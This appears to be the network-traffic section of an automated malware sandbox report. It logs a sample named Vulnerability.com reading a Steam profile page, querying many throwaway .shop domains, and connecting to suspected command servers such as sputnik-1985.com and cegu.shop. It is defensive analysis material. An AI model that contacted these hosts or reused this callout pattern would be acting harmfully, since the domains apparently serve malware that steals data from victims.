Jan 10, 2025 23:28:41.307178020 CET	49987	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:41.307480097 CET	49987	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:41.307495117 CET	443	49987	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:41.782704115 CET	443	49987	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:41.782799959 CET	49987	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:41.785213947 CET	49987	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:41.785228014 CET	443	49987	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:41.785444021 CET	443	49987	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:41.794958115 CET	49987	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:41.795062065 CET	49987	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:41.795092106 CET	443	49987	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:42.236114979 CET	443	49987	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:42.236191988 CET	443	49987	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:42.236277103 CET	49987	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:42.236577988 CET	49987	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:42.236603022 CET	443	49987	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:42.250041962 CET	49988	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:42.250083923 CET	443	49988	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:42.250159025 CET	49988	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:42.250420094 CET	49988	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:42.250436068 CET	443	49988	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:42.729718924 CET	443	49988	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:42.729942083 CET	49988	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:42.735814095 CET	49988	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:42.735862017 CET	443	49988	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:42.736242056 CET	443	49988	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:42.740890026 CET	49988	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:42.740994930 CET	49988	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:42.741010904 CET	443	49988	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:44.904756069 CET	443	49988	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:44.904876947 CET	443	49988	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:44.904978037 CET	49988	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:44.905205011 CET	49988	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:44.905253887 CET	443	49988	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:45.269551992 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.269634008 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:45.269726992 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.270287991 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.270306110 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:45.728360891 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:45.728518963 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.730313063 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.730326891 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:45.730531931 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:45.732289076 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.733016014 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.733048916 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:45.733179092 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.733208895 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:45.733330965 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.733367920 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:45.733505964 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.733535051 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:45.733690023 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.733721972 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:45.733867884 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.733896017 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:45.733906031 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.733918905 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:45.734065056 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.734091043 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:45.734117985 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.734266043 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.734293938 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.743093967 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:45.743253946 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.743273973 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:45.743294001 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.743335962 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.743362904 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:45.748683929 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:47.327037096 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:47.327305079 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:47.327439070 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:47.327518940 CET	49989	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:47.327549934 CET	443	49989	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:47.329394102 CET	49990	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:47.329490900 CET	443	49990	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:47.329710007 CET	49990	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:47.330074072 CET	49990	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:47.330107927 CET	443	49990	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:47.789151907 CET	443	49990	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:47.789237976 CET	49990	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:47.790474892 CET	49990	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:47.790501118 CET	443	49990	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:47.790801048 CET	443	49990	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:47.791882992 CET	49990	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:47.791923046 CET	49990	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:47.791966915 CET	443	49990	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:48.270937920 CET	443	49990	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:48.271150112 CET	443	49990	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:48.271334887 CET	49990	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:48.271610022 CET	49990	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:48.271651030 CET	443	49990	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:48.271686077 CET	49990	443	192.168.2.5	104.21.32.1
Jan 10, 2025 23:28:48.271703959 CET	443	49990	104.21.32.1	192.168.2.5
Jan 10, 2025 23:28:48.376025915 CET	49991	443	192.168.2.5	185.161.251.21
Jan 10, 2025 23:28:48.376069069 CET	443	49991	185.161.251.21	192.168.2.5
Jan 10, 2025 23:28:48.376132011 CET	49991	443	192.168.2.5	185.161.251.21
Jan 10, 2025 23:28:48.376446009 CET	49991	443	192.168.2.5	185.161.251.21
Jan 10, 2025 23:28:48.376462936 CET	443	49991	185.161.251.21	192.168.2.5
Jan 10, 2025 23:28:49.140024900 CET	443	49991	185.161.251.21	192.168.2.5
Jan 10, 2025 23:28:49.140141010 CET	49991	443	192.168.2.5	185.161.251.21
Jan 10, 2025 23:28:49.141525030 CET	49991	443	192.168.2.5	185.161.251.21
Jan 10, 2025 23:28:49.141539097 CET	443	49991	185.161.251.21	192.168.2.5
Jan 10, 2025 23:28:49.141801119 CET	443	49991	185.161.251.21	192.168.2.5
Jan 10, 2025 23:28:49.142853022 CET	49991	443	192.168.2.5	185.161.251.21
Jan 10, 2025 23:28:49.183341026 CET	443	49991	185.161.251.21	192.168.2.5
Jan 10, 2025 23:28:49.404067993 CET	443	49991	185.161.251.21	192.168.2.5
Jan 10, 2025 23:28:49.404310942 CET	443	49991	185.161.251.21	192.168.2.5
Jan 10, 2025 23:28:49.404474974 CET	49991	443	192.168.2.5	185.161.251.21
Jan 10, 2025 23:28:49.404474974 CET	49991	443	192.168.2.5	185.161.251.21
Jan 10, 2025 23:28:49.404474974 CET	49991	443	192.168.2.5	185.161.251.21
Jan 10, 2025 23:28:49.498045921 CET	49992	443	192.168.2.5	172.67.162.153
Jan 10, 2025 23:28:49.498131037 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:49.498222113 CET	49992	443	192.168.2.5	172.67.162.153
Jan 10, 2025 23:28:49.498538017 CET	49992	443	192.168.2.5	172.67.162.153
Jan 10, 2025 23:28:49.498559952 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:49.715934038 CET	49991	443	192.168.2.5	185.161.251.21
Jan 10, 2025 23:28:49.716006041 CET	443	49991	185.161.251.21	192.168.2.5
Jan 10, 2025 23:28:49.971004009 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:49.971103907 CET	49992	443	192.168.2.5	172.67.162.153
Jan 10, 2025 23:28:50.002064943 CET	49992	443	192.168.2.5	172.67.162.153
Jan 10, 2025 23:28:50.002139091 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.003194094 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.004635096 CET	49992	443	192.168.2.5	172.67.162.153
Jan 10, 2025 23:28:50.047323942 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.188575029 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.188724041 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.188843012 CET	49992	443	192.168.2.5	172.67.162.153
Jan 10, 2025 23:28:50.188874006 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.189038038 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.189099073 CET	49992	443	192.168.2.5	172.67.162.153
Jan 10, 2025 23:28:50.189112902 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.189268112 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.189321041 CET	49992	443	192.168.2.5	172.67.162.153
Jan 10, 2025 23:28:50.189331055 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.189479113 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.189532042 CET	49992	443	192.168.2.5	172.67.162.153
Jan 10, 2025 23:28:50.189543009 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.193401098 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.193473101 CET	49992	443	192.168.2.5	172.67.162.153
Jan 10, 2025 23:28:50.193484068 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.247159958 CET	49992	443	192.168.2.5	172.67.162.153
Jan 10, 2025 23:28:50.247179031 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.274808884 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.274883032 CET	49992	443	192.168.2.5	172.67.162.153
Jan 10, 2025 23:28:50.274889946 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.274914026 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.274961948 CET	49992	443	192.168.2.5	172.67.162.153
Jan 10, 2025 23:28:50.275126934 CET	49992	443	192.168.2.5	172.67.162.153
Jan 10, 2025 23:28:50.275137901 CET	443	49992	172.67.162.153	192.168.2.5
Jan 10, 2025 23:28:50.275178909 CET	49992	443	192.168.2.5	172.67.162.153
Jan 10, 2025 23:28:50.275183916 CET	443	49992	172.67.162.153	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 23:27:25.718488932 CET	63231	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:27:25.726425886 CET	53	63231	1.1.1.1	192.168.2.5
Jan 10, 2025 23:28:03.547496080 CET	50640	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:28:03.557434082 CET	53	50640	1.1.1.1	192.168.2.5
Jan 10, 2025 23:28:03.558871984 CET	50381	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:28:03.569205999 CET	53	50381	1.1.1.1	192.168.2.5
Jan 10, 2025 23:28:03.575154066 CET	61126	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:28:03.583894014 CET	53	61126	1.1.1.1	192.168.2.5
Jan 10, 2025 23:28:03.585263968 CET	63819	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:28:03.593931913 CET	53	63819	1.1.1.1	192.168.2.5
Jan 10, 2025 23:28:03.597572088 CET	65405	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:28:03.606376886 CET	53	65405	1.1.1.1	192.168.2.5
Jan 10, 2025 23:28:03.608592033 CET	56069	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:28:03.617343903 CET	53	56069	1.1.1.1	192.168.2.5
Jan 10, 2025 23:28:03.619601011 CET	60134	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:28:03.628282070 CET	53	60134	1.1.1.1	192.168.2.5
Jan 10, 2025 23:28:03.630578995 CET	53020	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:28:03.638972998 CET	53	53020	1.1.1.1	192.168.2.5
Jan 10, 2025 23:28:03.641208887 CET	59614	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:28:03.650257111 CET	53	59614	1.1.1.1	192.168.2.5
Jan 10, 2025 23:28:03.652426004 CET	61256	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:28:03.659014940 CET	53	61256	1.1.1.1	192.168.2.5
Jan 10, 2025 23:28:05.019104958 CET	60007	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:28:05.029807091 CET	53	60007	1.1.1.1	192.168.2.5
Jan 10, 2025 23:28:48.272945881 CET	54510	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:28:48.375154972 CET	53	54510	1.1.1.1	192.168.2.5
Jan 10, 2025 23:28:49.483751059 CET	50535	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:28:49.496438026 CET	53	50535	1.1.1.1	192.168.2.5
Jan 10, 2025 23:28:50.259164095 CET	58368	53	192.168.2.5	1.1.1.1
Jan 10, 2025 23:28:50.268039942 CET	53	58368	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 23:27:25.718488932 CET	192.168.2.5	1.1.1.1	0xf68b	Standard query (0)	vqOdvwsaFkSmirvHugHUcNrMgvS.vqOdvwsaFkSmirvHugHUcNrMgvS	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.547496080 CET	192.168.2.5	1.1.1.1	0x1b5d	Standard query (0)	throwlette.cyou	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.558871984 CET	192.168.2.5	1.1.1.1	0x2a8	Standard query (0)	soundtappysk.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.575154066 CET	192.168.2.5	1.1.1.1	0x9bf2	Standard query (0)	femalsabler.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.585263968 CET	192.168.2.5	1.1.1.1	0xfc11	Standard query (0)	apporholis.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.597572088 CET	192.168.2.5	1.1.1.1	0x8027	Standard query (0)	crowdwarek.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.608592033 CET	192.168.2.5	1.1.1.1	0xa9fe	Standard query (0)	versersleep.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.619601011 CET	192.168.2.5	1.1.1.1	0x5242	Standard query (0)	chipdonkeruz.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.630578995 CET	192.168.2.5	1.1.1.1	0xa76d	Standard query (0)	handscreamny.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.641208887 CET	192.168.2.5	1.1.1.1	0xbf47	Standard query (0)	robinsharez.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.652426004 CET	192.168.2.5	1.1.1.1	0xb94b	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:05.019104958 CET	192.168.2.5	1.1.1.1	0x3c4e	Standard query (0)	sputnik-1985.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:48.272945881 CET	192.168.2.5	1.1.1.1	0xbea0	Standard query (0)	cegu.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:49.483751059 CET	192.168.2.5	1.1.1.1	0xec48	Standard query (0)	klipgonuh.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:50.259164095 CET	192.168.2.5	1.1.1.1	0x4504	Standard query (0)	dfgh.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 23:27:25.726425886 CET	1.1.1.1	192.168.2.5	0xf68b	Name error (3)	vqOdvwsaFkSmirvHugHUcNrMgvS.vqOdvwsaFkSmirvHugHUcNrMgvS	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.557434082 CET	1.1.1.1	192.168.2.5	0x1b5d	Name error (3)	throwlette.cyou	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.569205999 CET	1.1.1.1	192.168.2.5	0x2a8	Name error (3)	soundtappysk.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.583894014 CET	1.1.1.1	192.168.2.5	0x9bf2	Name error (3)	femalsabler.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.593931913 CET	1.1.1.1	192.168.2.5	0xfc11	Name error (3)	apporholis.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.606376886 CET	1.1.1.1	192.168.2.5	0x8027	Name error (3)	crowdwarek.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.617343903 CET	1.1.1.1	192.168.2.5	0xa9fe	Name error (3)	versersleep.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.628282070 CET	1.1.1.1	192.168.2.5	0x5242	Name error (3)	chipdonkeruz.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.638972998 CET	1.1.1.1	192.168.2.5	0xa76d	Name error (3)	handscreamny.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.650257111 CET	1.1.1.1	192.168.2.5	0xbf47	Name error (3)	robinsharez.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:03.659014940 CET	1.1.1.1	192.168.2.5	0xb94b	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:05.029807091 CET	1.1.1.1	192.168.2.5	0x3c4e	No error (0)	sputnik-1985.com		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:05.029807091 CET	1.1.1.1	192.168.2.5	0x3c4e	No error (0)	sputnik-1985.com		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:05.029807091 CET	1.1.1.1	192.168.2.5	0x3c4e	No error (0)	sputnik-1985.com		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:05.029807091 CET	1.1.1.1	192.168.2.5	0x3c4e	No error (0)	sputnik-1985.com		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:05.029807091 CET	1.1.1.1	192.168.2.5	0x3c4e	No error (0)	sputnik-1985.com		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:05.029807091 CET	1.1.1.1	192.168.2.5	0x3c4e	No error (0)	sputnik-1985.com		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:05.029807091 CET	1.1.1.1	192.168.2.5	0x3c4e	No error (0)	sputnik-1985.com		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:48.375154972 CET	1.1.1.1	192.168.2.5	0xbea0	No error (0)	cegu.shop		185.161.251.21	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:49.496438026 CET	1.1.1.1	192.168.2.5	0xec48	No error (0)	klipgonuh.shop		172.67.162.153	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:49.496438026 CET	1.1.1.1	192.168.2.5	0xec48	No error (0)	klipgonuh.shop		104.21.15.122	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:28:50.268039942 CET	1.1.1.1	192.168.2.5	0x4504	Name error (3)	dfgh.online	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

sputnik-1985.com

cegu.shop

klipgonuh.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49871	104.102.49.254	443	2316	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:28:04 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2025-01-10 22:28:04 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 10 Jan 2025 22:28:04 GMT Content-Length: 35126 Connection: close Set-Cookie: sessionid=1328f4a8c72ba160e77e36e1; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-10 22:28:04 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-10 22:28:04 UTC	16384	IN	Data Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
2025-01-10 22:28:05 UTC	3768	IN	Data Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
